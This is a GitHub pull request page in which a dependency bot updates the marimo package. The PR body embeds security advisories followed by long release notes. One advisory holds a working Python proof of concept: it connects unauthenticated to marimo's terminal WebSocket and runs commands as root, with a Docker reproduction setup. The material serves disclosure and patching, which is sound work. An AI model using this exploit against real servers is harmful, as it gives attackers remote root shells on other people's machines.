Skip to content

chore(deps): update dependency marimo [security]#155

Open
renovate[bot] wants to merge 1 commit into
mainfrom
renovate/pypi-marimo-vulnerability
Open

chore(deps): update dependency marimo [security]#155
renovate[bot] wants to merge 1 commit into
mainfrom
renovate/pypi-marimo-vulnerability

Conversation

@renovate

@renovate renovate Bot commented Apr 8, 2026

Copy link
Copy Markdown
Contributor

ℹ️ Note

This PR body was truncated due to platform limits.

This PR contains the following updates:

Package Change Age Adoption Passing Confidence
marimo >0.14,<0.15>0.23,<0.24 age adoption passing confidence
marimo ==0.14.17==0.23.9 age adoption passing confidence

marimo vulnerable to proxy abuse of /mpl/{port}/

GHSA-xjv7-6w92-42r7

More information

Details

Summary

The /mpl/<port>/<route> endpoint, which is accessible without authentication on default Marimo installations allows for external attackers to reach internal services and arbitrary ports.

Details

From our understanding, this route is used internally to provide access to interactive matplotlib visualizations.
marimo/marimo/_server/main.py at main · marimo-team/marimo
This endpoint functions as an unauthenticated proxy, allowing an attacker to connect to any service running on the local machine via the specified <port> and <route>.

The existence of this proxy is visible in the application's code (marimo/_server/main.py), but there's no official documentation or warning about its behavior or potential risks.

Impact

CWE-441: Proxying Without Authentication

This vulnerability, as it can be used to bypass firewalls and access internal services that are intended to be local-only. The level of impact depends entirely on what services are running and accessible on the local machine.

Full Local Access: An attacker can use this proxy to connect to local services that answer to web sockets, HTTP or ASGI protocol, effectively gaining a foothold on the machine. Depending on the service, this can lead to remote code execution, data exfiltration, or further network penetration.

Exposure of Sensitive Services: Our scans of public-facing Marimo servers have shown that many are exposing sensitive internal services, including:

Old CUPS Servers: Could allow an attacker to view print jobs or configuration or depending on old vulnerabilities, allow RCE.

phpMyAdmin: Provides a web interface to a MySQL database, potentially exposing sensitive data.

RPCMapper: Can be used for network reconnaissance and enumerating services.

While you’d hope people wouldn’t expose marimo instances to the internet, we found numerous public Marimo instances using tools like Shodan. Many of these servers, some even hosted on cloud platforms like AWS GovCloud, were found to be vulnerable. This means the vulnerability isn't limited to a few isolated cases but is a widespread issue affecting production environments.

===

Notes, this was discovered by devgi. I (acepace) followed up and also created this report.

Severity

  • CVSS Score: 6.9 / 10 (Medium)
  • Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


Marimo: Pre-Auth Remote Code Execution via Terminal WebSocket Authentication Bypass

CVE-2026-39987 / GHSA-2679-6mx9-h9xc

More information

Details

Summary

Marimo (19.6k stars) has a Pre-Auth RCE vulnerability. The terminal WebSocket endpoint /terminal/ws lacks authentication validation, allowing an unauthenticated attacker to obtain a full PTY shell and execute arbitrary system commands.

Unlike other WebSocket endpoints (e.g., /ws) that correctly call validate_auth() for authentication, the /terminal/ws endpoint only checks the running mode and platform support before accepting connections, completely skipping authentication verification.

Affected Versions

Marimo <= 0.20.4

Vulnerability Details
Root Cause: Terminal WebSocket Missing Authentication

marimo/_server/api/endpoints/terminal.py lines 340-356:

@&#8203;router.websocket("/ws")
async def websocket_endpoint(websocket: WebSocket) -> None:
    app_state = AppState(websocket)
    if app_state.mode != SessionMode.EDIT:
        await websocket.close(...)
        return
    if not supports_terminal():
        await websocket.close(...)
        return
    # No authentication check!
    await websocket.accept()  # Accepts connection directly
    # ...
    child_pid, fd = pty.fork()  # Creates PTY shell

Compare with the correctly implemented /ws endpoint (ws_endpoint.py lines 67-82):

@&#8203;router.websocket("/ws")
async def websocket_endpoint(websocket: WebSocket) -> None:
    app_state = AppState(websocket)
    validator = WebSocketConnectionValidator(websocket, app_state)
    if not await validator.validate_auth():  # Correct auth check
        return
Authentication Middleware Limitation

Marimo uses Starlette's AuthenticationMiddleware, which marks failed auth connections as UnauthenticatedUser but does NOT actively reject WebSocket connections. Actual auth enforcement relies on endpoint-level @requires() decorators or validate_auth() calls.

The /terminal/ws endpoint has neither a @requires("edit") decorator nor a validate_auth() call, so unauthenticated WebSocket connections are accepted even when the auth middleware is active.

Attack Chain
  1. WebSocket connect to ws://TARGET:2718/terminal/ws (no auth needed)
  2. websocket.accept() accepts the connection directly
  3. pty.fork() creates a PTY child process
  4. Full interactive shell with arbitrary command execution
  5. Commands run as root in default Docker deployments

A single WebSocket connection yields a complete interactive shell.

Proof of Concept
import websocket
import time

##### Connect without any authentication
ws = websocket.WebSocket()
ws.connect('ws://TARGET:2718/terminal/ws')
time.sleep(2)

##### Drain initial output
try:
    while True:
        ws.settimeout(1)
        ws.recv()
except:
    pass

##### Execute arbitrary command
ws.settimeout(10)
ws.send('id\n')
time.sleep(2)
print(ws.recv())  # uid=0(root) gid=0(root) groups=0(root)
ws.close()
Reproduction Environment
FROM python:3.12-slim
RUN pip install --no-cache-dir marimo==0.20.4
RUN mkdir -p /app/notebooks
RUN echo 'import marimo as mo; app = mo.App()' > /app/notebooks/test.py
WORKDIR /app/notebooks
EXPOSE 2718
CMD ["marimo", "edit", "--host", "0.0.0.0", "--port", "2718", "."]
Reproduction Result

With auth enabled (server generates random access_token), the exploit bypasses authentication entirely:

$ python3 exp.py http://127.0.0.1:2718 exec "id && whoami && hostname"
[+] No auth needed! Terminal WebSocket connected
[+] Output:
uid=0(root) gid=0(root) groups=0(root)
root
ddfc452129c3
Suggested Remediation
  1. Add authentication validation to /terminal/ws endpoint, consistent with /ws using WebSocketConnectionValidator.validate_auth()
  2. Apply unified authentication decorators or middleware interception to all WebSocket endpoints
  3. Terminal functionality should only be available when explicitly enabled, not on by default
Impact

An unauthenticated attacker can obtain a full interactive root shell on the server via a single WebSocket connection. No user interaction or authentication token is required, even when authentication is enabled on the marimo instance.

Severity

  • CVSS Score: 9.3 / 10 (Critical)
  • Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


marimo contains a reflected cross-site scripting vulnerability in the notebook page

CVE-2026-54386 / GHSA-8m59-7xv8-735h

More information

Details

marimo before 0.23.9 contains a reflected cross-site scripting vulnerability in the notebook page that allows unauthenticated attackers to inject arbitrary JavaScript by exploiting improper escaping of single quotes in the file query parameter reflected into an inline JavaScript string literal. Attackers can craft a malicious link with a payload beginning with new to bypass the 404 check and inject JavaScript into the page, which executes without Content-Security-Policy restrictions in the origin of a victim's marimo server.

Severity

  • CVSS Score: 5.1 / 10 (Medium)
  • Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


Release Notes

marimo-team/marimo (marimo)

v0.23.14

Compare Source

What's Changed

This release brings anywidget composition with hot reload, an experimental debugger with per-line timing, chat AI improvements, and cached WASM exports.

Plus many fixes across charts, tables, and exports.

⭐️ Highlights

Anywidget composition and hot reload

marimo now supports anywidget's new composition API: parent widgets can render child widgets they were handed as values. Widget frontend code also hot-reloads in place as you edit it — live views re-render with widget state intact (#​10127).

image

Read the docs for more on building custom UI plugins.

Debugger and per-line timing

An experimental debugger execution lifecycle adds frame watching to cell execution, highlighting the currently executing line and enabling debug points (#​9970).

Screen.Recording.2026-06-23.at.9.53.50.AM.mov

Building on the same machinery, the experimental line_timing flag shows an elapsed-time pill on any line that has been busy for more than ~500ms (#​10126).

Chat AI improvements

The AI chat panel picked up several upgrades this release:

  • Web search and fetch — the chat panel can now search and fetch from the web, adapting to your provider's native tools when available (#​10052)
  • Errors as chat context — mention @error://all or a single cell's error to attach its source, traceback, and SQL schema as context chips (#​10038)
  • "Fix in chat" — cell errors and tracebacks gain an option to route the failing code straight into the sidebar (#​10024)
  • Prompt caching — enabled for supported providers (#​10052)
Screen.Recording.2026-06-30.at.5.24.02.PM.mov

Read the docs for more on AI features.

Cached WASM exports

marimo export html-wasm --execute now bundles runtime cache into the export, so published notebooks hydrate cell outputs from cache instead of recomputing them in the browser (#​9897). This lets you share interactive snapshots of executions that normally can't run in the browser at all (like a jax or torch training run) while the rest of the notebook stays live. Built on a new cell-level cached execution lifecycle, opt-in via [tool.marimo.runtime] cache_cells = true (#​9895).

Screen.Recording.2026-07-08.at.4.39.03.PM.mov

Read the docs for more on exporting notebooks.

✨ Enhancements

  • Support anywidget composition and hot reload (#​10127)
  • Add signatures to cache bundles to prevent tamper (#​10123)
  • Add MARIMO_SESSION_COOKIE_SECURE env var for Secure session cookie (#​10117)
  • Support mdx flavor in md export (#​10116)
  • Honor per-cell hide_code in kiosk and reader views (#​10111)
  • Allow selecting a pandas DataFrame index as a chart axis (#​10097)
  • Add web search and fetch capabilities to AI chat, with provider caching (#​10052)
  • Single-cell error chips and auto-sync resource map (#​10038)
  • Add "Hide all" columns action (#​10068)
  • Introduce progressive loading for WASM (#​10044)
  • Open home in a new tab instead of replacing the current one (#​10066)
  • Add "Fix with AI assistant" option for errors (#​10024)
  • Better completions around function calls (#​10045)
  • Add Fable and Sonnet 5 to models list (#​10051)
  • Avoid bumping __generated_with when that's the only change in a notebook (#​10027)
  • Bundle session caches into html-wasm --execute output (#​9897)
  • Cell-level cached execution lifecycle (#​9895)

🐛 Bug fixes

  • Fix mounting anywidget CSS in cross-realm roots (#​10136)
  • Allow WebPDF export on Windows (#​10131)
  • Preserve aspect ratio for images with numeric dimensions (#​10130)
  • Fall back to interpreter completion when jedi static analysis raises (#​10100)
  • Make graceful kernel shutdown opt-in to unblock event loop (#​10124)
  • Classify SetBreakpointsCommand and resync breakpoints on restart (#​10120)
  • Key task-list checkboxes by checked state to prevent stale render (#​10114)
  • Extend LSP go-to-definition fallback to context menu and cmd+click (#​10102)
  • Increased cache robustness for wire level cell resolution (#​10109)
  • Respect per-notebook inline theme when serving a directory (#​10101)
  • ASGI credentials reflection (#​10107)
  • Fix pie chart rendering when innerRadius is undefined (#​10104)
  • Apply mo.ui.dataframe row filter when submitted via .form() (#​10092)
  • Render legacy named render/initialize exports (#​10093)
  • Don't grey out streaming output in grid and slides layouts (#​10094)
  • Fix data editor in fullscreen (#​10098)
  • Make the rename symbol popup readable in dark mode (#​10091)
  • Fix external go to definition (#​10099)
  • Cache os.path.realpath results in _is_user_module (#​10086)
  • Readonly view selects SQL language (#​10074)
  • Polars lazyframe query plan visualisation fix (#​10087)
  • Preserve leading and trailing comments when formatting cells (#​10060)
  • Show sql snippet cells as sql instead of python (#​10050)
  • Restore write permission on export directory after copytree on Nix (#​10041)
  • Expand dict transformation (#​9561)

📚 Documentation

  • Fix single-column example in mo.ui.table docstring (#​10075)
  • Emphasize non-reactivity of mo.ui.panel in its docstring (#​10067)

🔬 Preview features

  • Experimental line_timing — green active-line highlight + per-line timer (#​10126)
  • Experimental SSE transport for the kernel connection (MARIMO_SERVER_TRANSPORT) (#​10119)
  • Debugger execution lifecycle (#​9970)

Contributors

Thanks to all our community and contributors who made this release possible: @​akshayka, @​brookpatten, @​David-Wu1119, @​dmadisetti, @​eeshsaxena, @​Felipenguim, @​Hemanth-1354, @​kirangadhave, @​Light2Dark, @​manzt, @​mscolnick, @​ohmdelta, @​Oishe, @​peter-gy, @​qorexdevs, @​VishakBaddur, @​wally-an, @​yairchu

And especially to our new contributors:

Full Changelog: marimo-team/marimo@0.23.13...0.23.14

v0.23.13

Compare Source

v0.23.12

Compare Source

What's Changed

✨ Enhancements

  • Improve anywidget invalid module error messages (#​10026)
  • WandB models updated (#​10040)
  • LazyStore dual-mode WASM backend (#​9898)
  • Avoid forced min-width and horizontal clipping in mobile app view (#​10023)
  • Stamp context attachments (#​9994)
  • Update llm-info model catalog and backfill descriptions (#​10002)
  • Hydrate islands from JSON payloads (#​9987)
  • Suppress kernel-dependent table controls in static export (#​10007)
  • Keyboard and screen-reader accessibility for mo.ui.file_browser (#​10005)
  • synonyms for showing code in the command palette (#​9993)
  • Defer marimo-pair references and improve code mode prompts (#​9985)
  • Support array protocol objects (torch.Tensor, JAX, etc.) in mo.audio (#​9943)

🐛 Bug fixes

  • Use CSS styles for width/height to support percentage values (#​9966)
  • Close pty master before reaping to avoid event-loop deadlock (#​10031)
  • Bump ruff version for test failures (#​10029)
  • Remove unavailable models (#​10025)
  • Keep with_dynamic_directory serving after a directory symlink swap (#​10015)
  • Avoid double formatting in mo.output.replace (#​9909)
  • Typing for numpy as indices (#​10014)
  • Use GITHUB_TOKEN for sync-llm-info PR creation (#​9998)
  • Ignore D421 property-docstring-starts-with-verb lint rule (#​9992)

📝 Other changes

Contributors

Thanks to all our community and contributors who made this release possible: @​akshayka, @​allin2, @​app/github-actions, @​dmadisetti, @​kirangadhave, @​koaning, @​ktaletsk, @​Light2Dark, @​lxingy3, @​mscolnick, @​peter-gy, @​Vitaliy-Pikalo

New Contributors

Full Changelog: marimo-team/marimo@0.23.11...0.23.12

v0.23.11

Compare Source

What's Changed

This release gives mo.ui.table finer display control (fixed column widths, a toggleable search bar, and a reusable display config).
Additionally mo.output.clear_console() adds a way to clear console output mid-run, and ships a broad set of fixes across AI config, exports, and the data sources tree.

Various other bug fixes like matplotlib==3.11 support in mo.mpl.interactive and pydantic-slim integration also ship in this release.

⭐️ Highlights

More control over mo.ui.table display

You can now size and trim tables to fit your data. column_widths pins named columns to an exact pixel width (great for long file paths or notes that used to get clipped), while unlisted columns continue to size to their content. The search bar is now toggleable via show_search, and the four visibility flags are available as a reusable mo.ui.table.Display config you can build once and unpack into many tables (#​9982, #​9984).

mo.ui.table(df, column_widths={"filename": 600, "id": 60})

# Reusable display config
cfg = mo.ui.table.Display(show_search=False, show_download=False)
mo.ui.table(data, **cfg)
mo.ui.table(other, **{**cfg, "show_column_summaries": False})

Clear console output mid-run

mo.output.clear_console() clears a cell's console output while it's still running, and the clear now sticks across reconnects, exports, and the on-disk session cache, not just in the live view. This replaces the old "re-run the cell to clear it" workaround.

✨ Enhancements

  • Add show/hide all code commands to command palette (#​9989)
  • Add show_search and a reusable mo.ui.table.Display config (#​9984)
  • Add column_widths to mo.ui.table (#​9982)
  • Stub serialization toolkit (class/lazy/module stubs) (#​9896)
  • Add more trace attributes under an AI span (#​9968)
  • Only auto-expand search matches in the data sources tree (#​9955)
  • Disable settings overridden by pyproject.toml (#​9961)
  • Tighten markdown heading spacing (#​9962)
  • Add mo.output.clear_console() (#​9950)

🐛 Bug fixes

  • Remove print page margin and inset content for themed PDF export (#​9971)
  • Support matplotlib 3.11 interactive (#​9990)
  • Add repair for orphaned tool calls (#​9976)
  • Wrap cells in function scope before ruff formatting (#​9889)
  • Allow DeepSeek custom provider configuration (#​9969)
  • Stringify pint-pandas values in table JSON output (#​9951)
  • Prevent hard failure on malformed AI config (#​9960)
  • Open AI settings from command palette when ai.enabled is false (#​9937)
  • Count lines like ast/tokenize, not str.splitlines() (#​9957)
  • Keep interactively-created hidden cells editable on creation (#​9958)
  • Delete local variables after cell execution (#​9933)
  • Correct fully-qualified table name in column previews (#​9954)

📚 Documentation

  • Fix shebangs /bin/bash -> /usr/bin/env bash (#​9942)

📝 Other changes

  • Bump pydantic-ai, and cap to v2 (#​9978)
  • sidebar code-mode: add run_scratchpad utility functions (#​9637, 068f140)
  • Tooling to generate canonical DESIGN.md (#​9641, 7f29fa3)
  • Support nested schemas for data sources (#​9837, #​9845, 06b152a)

Contributors

Thanks to all our community and contributors who made this release possible: @​akshayka, @​dmadisetti, @​kirangadhave, @​Light2Dark, @​lzblack, @​peter-gy, @​skaphi, @​VishakBaddur

And especially to our new contributors:

Full Changelog: marimo-team/marimo@0.23.10...0.23.11

v0.23.10

Compare Source

What's Changed

This release brings threading and multiprocessing to WASM notebooks and makes remote storage browsing scale with search and pagination — alongside table column controls, slide editing improvements, and a broad set of fixes.

⭐️ Highlights

Pyodide 314.0

This release moves marimo's WebAssembly runtime to Pyodide's latest release: Pyodide 314.0. This allows use to use newer versions of duckdb, polars, and pyarrow as well as many other popular packages.

Threading and multiprocessing in WASM

WASM notebooks can now run threading- and multiprocessing-shaped code. marimo installs lightweight adapters for Pyodide so mo.Thread, stdlib threading primitives, and common multiprocessing APIs keep working in the browser, executing on a synthetic thread identity that the marimo runtime context follows (#​9839).

Screen.Recording.2026-06-09.at.16.56.56.mov

Scalable remote storage browsing

Browsing large remote storage backends is now practical. Listings paginate behind a "Load more" button instead of loading everything up front, and when a prefix query matches none of the already-loaded entries, marimo pages through the backend to surface remote results — matching on full paths so partial path queries resolve, with clear status while it searches (#​9834, #​9835).

Screen.Recording.2026-06-10.at.11.56.00.AM.mov

✨ Enhancements

  • Search the backend when no loaded entries match (#​9835)
  • Honor OTEL_SERVICE_NAME for traces (#​9906)
  • Progressively mount cell editors in the editor view (#​9904)
  • Generate Google Drive connection code for embedded environments (#​9884)
  • Paginate remote storage listings with a "Load more" button (#​9834)
  • Threading and multiprocessing adapters in WASM (#​9839)
  • Gate schema discovery behind "auto" for remote engines (#​9784)
  • Column visibility dropdown in table top bar (#​9865)
  • Support ROCM for /api/usage endpoint (#​9773)
  • Shared select-core for multiselect, dropdown, and filter picker (#​9849)
  • Per-slide show-code config + editor toggles (#​9831)
  • Resolve definitions and get docstring (#​9838)
  • Minimap insert-cell + context menu (#​9830)
  • Add a toggle to filter empty schemas and db (#​9712)
  • Wire Dremio dialect into the SQL editor (#​9817)
  • Allow lazy (callable) filename (#​9799)
  • Styled tooltip for mo.ui.table hover_template (#​9780)
  • Remove beta status for opencode (#​9791)

🐛 Bug fixes

  • Deflake CI by ignoring finished WASM thread records (#​9914)
  • Rewrite double-quoted DuckDB sources in WASM (#​9925)
  • Avoid crash when creating a markdown cell (#​9923)
  • Stop logging raw AI config at debug level (#​9911)
  • Handle missing psutil gracefully for Android/Termux (#​9872)
  • Make WASM as_completed timeout deterministic (#​9891)
  • Keep !-command cells from disabling underscore-privatization on convert (#​9873)
  • Respect user-configured marimo data transformer (#​9887)
  • Skip chart for nested/unknown column types (#​9876)
  • Correct editable input behavior with steps and fractional values (#​9860)
  • Allow async cancellation (#​9705)
  • Apply ordering to frozen set as it drifts with PYTHONHASHSEED (#​9861)
  • Highlight python code blocks in ty hover tooltips (#​9824)
  • Disable speaker notes handle on fullscreen (#​9825)
  • Disambiguate storage entries with duplicate paths (#​9832)
  • Add docstring styles for links (#​9827)
  • Infer provider profile from base_url for custom providers (#​9813)
  • Store video sources as virtual files instead of inlining (#​9812)
  • Show static-preview notice once per session (#​9796)
  • Stop reusable hint flicker on cell updates (#​9782)
  • Land focus in target cell on right-click Go to Definition (#​9795)
  • Fix reactive go-to-definition lookup (#​9747)
  • Coalesce outgoing document transactions to avoid intra-batch conflicts (#​9781)

📚 Documentation

  • Admonition (#​9903)
  • Support PEP 508 Emscripten dependency markers (#​9864)
  • Update SECURITY.md (#​9863)
  • Add entry on jupyter-book-marimo plugin (#​9802)

📝 Other changes

Contributors

Thanks to all our community and contributors who made this release possible: @​agriyakhetarpal, @​akshayka, @​dmadisetti, @​kirangadhave, @​koaning, @​Light2Dark, @​mscolnick, @​nkgotcode, @​peter-gy, @​Set27, @​VishakBaddur

And especially to our new contributors:

Full Changelog: marimo-team/marimo@0.23.9...0.23.10

v0.23.9

Compare Source

What's Changed

This release makes opening a notebook in a second tab non-destructive, mo.ui.table adds new args for hidden_columns/visible_columns (mutually exclusive), and tightens sharing and error-output behavior across the board.

⭐️ Highlights
Open the same notebook in a second tab

Opening a notebook in a second browser tab no longer forcibly disconnects the first. The new tab joins as a live, read-only viewer, and you can take over editing from either side with a single click — no destructive modal and no reload required (#​9746).

Screen.Recording.2026-06-01.at.3.31.17.PM.mov

Show and hide table columns

mo.ui.table now supports column visibility. Hide and show columns from the column header menu, Column Explorer with a click, find columns fast with smart prefix-based search, and control initial visibility from Python. A hidden-count and "Unhide all" link keep things discoverable (#​9687, #​9696).

Screen.Recording.2026-05-26.at.6.35.04.PM.mov

Cells with no output now show in slides

Because slides allow code edits, a slide edited to no longer produce an output used to disappear from the deck entirely. Such cells now appear in the slides minimap and viewer so you can edit them back in (they're still skipped during a presentation). Minimap thumbnails are also larger and more readable (#​9771).

Screen.Recording.2026-06-03.at.2.25.46.PM.mov

✨ Enhancements
  • Add MARIMO_RESTRICT_SHARING env var machine-wide (#​9756)
  • Non-destructive local takeover (read-only viewer + bidirectional takeover) (#​9746)
  • Add cells with no output to the minimap & viewer (#​9771)
  • Add GET /api/kernel/status endpoint (#​9768)
  • Enforce sharing config as server-side security (#​9578)
  • Add filter param for regex and callable filtering (#​9667)
  • Slides config panel open by default (#​9737)
  • Add pair with agent link (#​9738)
  • Add Opus 4.8 and script to append models to the top (#​9723)
  • Remove mapping for 'src' to 'auto-mix-prep' (#​9725)
  • Add workflow to automate running llm-sync-models script (#​9724)
  • Automation script to pull models.yml (#​9635)
  • Support Dremio ADBC data source browsing (#​9694)
  • Add auto_close_pairs setting (#​9711)
  • WASM compatibility rule checks (#​9587)
  • Fix dropped error hints and improve error output UI (#​9673)
  • Column Explorer visibility controls + smart-search (#​9696)
  • Sort toml entries when writing config (#​9686)
  • Pretty format hidden variable behavior in stack traces (#​9660)
  • Add column visibility kwargs and UI controls (#​9687)
  • Unified filter pill UI with overflow strip (#​9638)
  • Add padding between cell number and minimap dependency lines (#​9675)
🐛 Bug fixes
  • Escape user-controlled file_key in service worker injection (#​9789)
  • Fix completions in slides view (#​9769)
  • Arg/kwarg collision for local numpy vars in caching (#​9751)
  • Suppress marimo hover tooltip for all LSP providers, not just pylsp (#​9741)
  • Fix SQL defs lookup (#​9754)
  • Keep stepped range progress totals aligned (#​9582)
  • Per-provider max_tokens defaults with optional override (#​9703)
  • Accept ChartDataType in mo.ui.table to resolve pyright error when passing chart.value (#​9674)
  • Jump to running notebook cells only (#​9707)
  • Fix mo.cache raising KeyError: 'scratch' in scratchpad (#​9664)
  • Fix interruption for pydantic-ai chatbot (#​9620)
  • Preserve top level names for name thrashing (#​9695)
  • Lazy download-size RPC + first-page extrapolation (#​9691)
📚 Documentation
  • Add config to disable AI (#​9739)
  • Update molab docs with new compute and sharing features (#​9748)
📝 Other changes
  • Don't shadow builtin print unless mo.Thread is used (#​9765, #​9766)
  • Zz/zt/zb scroll for notebook viewport (#​9701, #​9728)
  • Add rule to prevent test files from having the same name (#​9671)
Contributors

Thanks to all our community and contributors who made this release possible: @​akshayka, @​corleyma, @​dmadisetti, @​everettroeth, @​foxcroftjn, @​GHX5T-SOL, @​kirangadhave, @​kjgoodrick, @​kratos0718, @​Light2Dark, @​mscolnick, @​nojaf, @​Rowlando13, @​VishakBaddur, @​XanthanGum

And especially to our new contributors:

Full Changelog: marimo-team/marimo@0.23.8...0.23.9

v0.23.8

Compare Source

v0.23.7

Compare Source

What's Changed

This release brings major upgrades to table filtering, adds speaker notes to slide view, and lets WASM notebooks query remote files with DuckDB.

⭐ Highlights
Powerful new table column filters

Table columns now support the full operator set across every dtype. Text columns get contains, starts_with, ends_with, equals, regex, is_empty, and more, with a slash-bracketed regex input and a creatable values picker for in / not_in. Number columns get native between, and the new date/datetime/time filter UI brings the same operator coverage to date-like columns with smart clipboard paste for ISO/US/RFC dates and A - B ranges (#​9597, #​9615).

Screen.Recording.2026-05-18.at.7.54.06.PM.mov

Speaker notes for slides

Press S in slide view to open speaker notes alongside the current slide, including in fullscreen and kiosk mode (#​9533).

Screen.Recording.2026-05-12.at.5.32.23.PM.mov

Query remote files with DuckDB in WASM notebooks

WASM notebooks can now read CSV, Parquet, JSON, and GeoJSON over HTTP from mo.sql, SQL cells, raw duckdb.sql/query/execute, connection SQL methods, and the duckdb.read_csv/read_parquet/read_json Python API. marimo rewrites the AST with sqlglot, fetches the remote file via its shared WASM fetch util, and binds the result as a pandas DataFrame that DuckDB can scan (#​9480).

SELECT * FROM read_csv('https://example.com/cars.csv')
✨ Enhancements
  • Expand column filter operators and pill-editor UX (#​9597)
  • Date/datetime/time filter UI (#​9615)
  • Add speaker notes for slides (#​9533)
  • Support HTTP DuckDB queries in WASM notebooks (#​9480)
  • Snapshot document and outputs in MCP execute_code (#​9654)

Note

PR body was truncated to here.


Configuration

📅 Schedule: (UTC)

  • Branch creation
    • At any time (no schedule defined)
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

👻 Immortal: This PR will be recreated if closed unmerged. Get config help if that's undesired.


  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch from 1c65b54 to 7beba5b Compare April 15, 2026 14:02
@renovate renovate Bot changed the title chore(deps): update dependency marimo to v0.23.0 [security] chore(deps): update dependency marimo [security] Apr 15, 2026
@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch from 7beba5b to b6a8cd0 Compare April 16, 2026 16:51
@renovate renovate Bot changed the title chore(deps): update dependency marimo [security] chore(deps): update dependency marimo to v0.23.0 [security] Apr 16, 2026
@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch from b6a8cd0 to 92a9dc4 Compare April 19, 2026 12:42
@renovate renovate Bot changed the title chore(deps): update dependency marimo to v0.23.0 [security] chore(deps): update dependency marimo [security] Apr 19, 2026
@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch from 92a9dc4 to 89157b8 Compare April 19, 2026 21:51
@renovate renovate Bot changed the title chore(deps): update dependency marimo [security] chore(deps): update dependency marimo to v0.23.0 [security] Apr 19, 2026
@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch from 89157b8 to 1b75e66 Compare April 21, 2026 20:09
@renovate renovate Bot changed the title chore(deps): update dependency marimo to v0.23.0 [security] chore(deps): update dependency marimo [security] Apr 21, 2026
@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch from 1b75e66 to a6e4045 Compare April 21, 2026 23:32
@renovate renovate Bot changed the title chore(deps): update dependency marimo [security] chore(deps): update dependency marimo to v0.23.0 [security] Apr 21, 2026
@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch from a6e4045 to dc3b16f Compare April 23, 2026 14:36
@renovate renovate Bot changed the title chore(deps): update dependency marimo to v0.23.0 [security] chore(deps): update dependency marimo [security] Apr 23, 2026
@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch from dc3b16f to 2ee2688 Compare April 23, 2026 19:51
@renovate renovate Bot changed the title chore(deps): update dependency marimo [security] chore(deps): update dependency marimo to v0.23.0 [security] Apr 23, 2026
@renovate renovate Bot changed the title chore(deps): update dependency marimo to v0.23.0 [security] chore(deps): update dependency marimo to v0.23.0 [security] - autoclosed Apr 27, 2026
@renovate renovate Bot closed this Apr 27, 2026
@renovate renovate Bot deleted the renovate/pypi-marimo-vulnerability branch April 27, 2026 18:58
@renovate renovate Bot changed the title chore(deps): update dependency marimo to v0.23.0 [security] - autoclosed chore(deps): update dependency marimo to v0.23.0 [security] Apr 27, 2026
@renovate renovate Bot reopened this Apr 27, 2026
@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch 3 times, most recently from 1f90162 to b1db5a5 Compare April 29, 2026 14:40
@renovate renovate Bot changed the title chore(deps): update dependency marimo to v0.23.0 [security] chore(deps): update dependency marimo [security] Apr 29, 2026
@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch from b1db5a5 to bd3e8da Compare April 29, 2026 22:08
@renovate renovate Bot changed the title chore(deps): update dependency marimo [security] chore(deps): update dependency marimo to v0.23.0 [security] Apr 29, 2026
@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch from bd3e8da to 35c4452 Compare April 30, 2026 17:00
@renovate renovate Bot changed the title chore(deps): update dependency marimo to v0.23.0 [security] chore(deps): update dependency marimo [security] Apr 30, 2026
@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch from 35c4452 to 36aaa06 Compare April 30, 2026 22:53
@renovate renovate Bot changed the title chore(deps): update dependency marimo [security] chore(deps): update dependency marimo to v0.23.0 [security] May 14, 2026
@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch from a5b60ca to 3f2d51b Compare May 18, 2026 09:39
@renovate renovate Bot changed the title chore(deps): update dependency marimo to v0.23.0 [security] chore(deps): update dependency marimo [security] May 18, 2026
@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch from 3f2d51b to 9993c4f Compare May 18, 2026 18:16
@renovate renovate Bot changed the title chore(deps): update dependency marimo [security] chore(deps): update dependency marimo to v0.23.0 [security] May 18, 2026
@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch from 9993c4f to 7103775 Compare May 22, 2026 20:42
@renovate renovate Bot changed the title chore(deps): update dependency marimo to v0.23.0 [security] chore(deps): update dependency marimo [security] May 22, 2026
@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch from 7103775 to d5bc079 Compare May 23, 2026 02:29
@renovate renovate Bot changed the title chore(deps): update dependency marimo [security] chore(deps): update dependency marimo to v0.23.0 [security] May 23, 2026
@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch from d5bc079 to d196089 Compare May 28, 2026 18:33
@renovate renovate Bot changed the title chore(deps): update dependency marimo to v0.23.0 [security] chore(deps): update dependency marimo [security] May 28, 2026
@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch from d196089 to f435040 Compare May 28, 2026 22:50
@renovate renovate Bot changed the title chore(deps): update dependency marimo [security] chore(deps): update dependency marimo to v0.23.0 [security] May 28, 2026
@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch from f435040 to ae70632 Compare June 1, 2026 19:35
@renovate renovate Bot changed the title chore(deps): update dependency marimo to v0.23.0 [security] chore(deps): update dependency marimo [security] Jun 1, 2026
